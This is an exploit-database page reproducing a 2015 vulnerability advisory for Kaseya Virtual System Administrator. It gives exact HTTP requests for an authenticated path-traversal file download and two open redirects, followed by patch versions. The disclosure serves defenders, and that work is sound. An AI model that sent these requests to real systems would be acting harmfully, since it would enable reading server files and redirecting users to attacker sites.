0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kaseya Virtual System Administrator File Download / Open Redirect Vulnerabilities
[Two vulns in Kaseya Virtual System Administrator - an authenticated arbitrary file download and two lame open redirects. Full advisory text below and at [1]. Thanks to CERT for helping me to disclose these vulnerabilities [2]. >> Multiple vulnerabilities in Kaseya Virtual System Administrator >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 13/07/2015 / Last updated: 13/07/2015 >> Background on the affected product: "Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show." >> Technical details: #1 Vulnerability: Arbitary file download (authenticated) Affected versions: unknown, at least v9 GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini Referer: http://10.0.0.3/ A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal. This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\). #2 Vulnerability: Open redirect (unauthenticated) Affected versions: unknown, at least v7 to XXX a) http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com b) GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com Host: www.google.com (host header has to be spoofed to the target) >> Fix: R9.1: install patch 9.1.0.4 R9.0: install patch 9.0.0.14 R8.0: install patch 8.0.0.18 V7.0: install patch 7.0.0.29 # 0day.today [2024-11-15] #